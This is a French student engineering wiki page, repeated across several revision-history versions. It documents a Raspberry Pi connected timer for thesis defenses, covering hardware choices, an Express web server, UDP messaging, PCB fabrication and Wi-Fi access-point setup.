Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
Lors de cette séance, des afficheurs 7-segments nous ont été fournis. Cependant, ils présentent la particularité d'être alimenté avec 12V. Les alimenter directement par la Raspberry qui elle peut fournir 5V n'est donc pas possible. <br />
<br />
Nous avons passé du temps lors de cette séance à trouver une solution pour le contrôle des LED. Nous en avons retenu deux : <br />
<br />
- Utiliser des pilotes de LED [http://www.ti.com/lit/ds/symlink/tlc5947.pdf TLC5947] <br />
<br />
- Utiliser des transistors<br />
<br />
Nous avons alors décidé de partir sur les pilotes de LED pour plus de simplicité, ces derniers gérant eux mêmes le courant fournis aux LED. Après avoir pris cette décision, nous avons débuté la conception de la carte sous Eagle. Nous avons choisi ce logiciel car les toutes les footprint des composants utilisés sont disponibles sur le net.<br />
<br />
==Séance 3==<br />
<br />
===Carte électronique===<br />
<br />
Après avoir bien avancé sur la carte, nous nous sommes rendu compte que les afficheurs utilisés étaient à cathode commune. Cela pose un problème puisque les pilotes de LED dont nous disposons ne sont pas compatibles avec cette configuration. Nous avons donc du nous tourner vers l'autre solution pour le contrôle des leds, celle avec les transistors. Disposant de 4 afficheurs à 7segments (+ le point), les GPIO de la Raspberry ne sont pas assez nombreux, nous avons donc du utiliser des multiplexeurs. Nous avons alors passé cette séance à étudier les datasheet des différents composants et à établir un nouveau schéma pour la carte.<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
<br />
==Séance 4==<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49396P4 IOT 20182019-01-20T23:24:28Z<p>Mcreteur : /* Séance 2 */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
Lors de cette séance, des afficheurs 7-segments nous ont été fournis. Cependant, ils présentent la particularité d'être alimenté avec 12V. Les alimenter directement par la Raspberry qui elle peut fournir 5V n'est donc pas possible. <br />
<br />
Nous avons passé du temps lors de cette séance à trouver une solution pour le contrôle des LED. Nous en avons retenu deux : <br />
<br />
- Utiliser des pilotes de LED [http://www.ti.com/lit/ds/symlink/tlc5947.pdf TLC5947] <br />
<br />
- Utiliser des transistors<br />
<br />
Nous avons alors décidé de partir sur les pilotes de LED pour plus de simplicité, ces derniers gérant eux mêmes le courant fournis aux LED. Après avoir pris cette décision, nous avons débuté la conception de la carte sous Eagle. Nous avons choisi ce logiciel car les toutes les footprint des composants utilisés sont disponibles sur le net.<br />
<br />
==Séance 3==<br />
<br />
===Carte électronique===<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
<br />
==Séance 4==<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49395P4 IOT 20182019-01-20T22:44:57Z<p>Mcreteur : /* Séance 3 */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
==Séance 3==<br />
<br />
===Carte électronique===<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
<br />
==Séance 4==<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49394P4 IOT 20182019-01-20T22:39:37Z<p>Mcreteur : /* Séance 2 */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
==Séance 3==<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
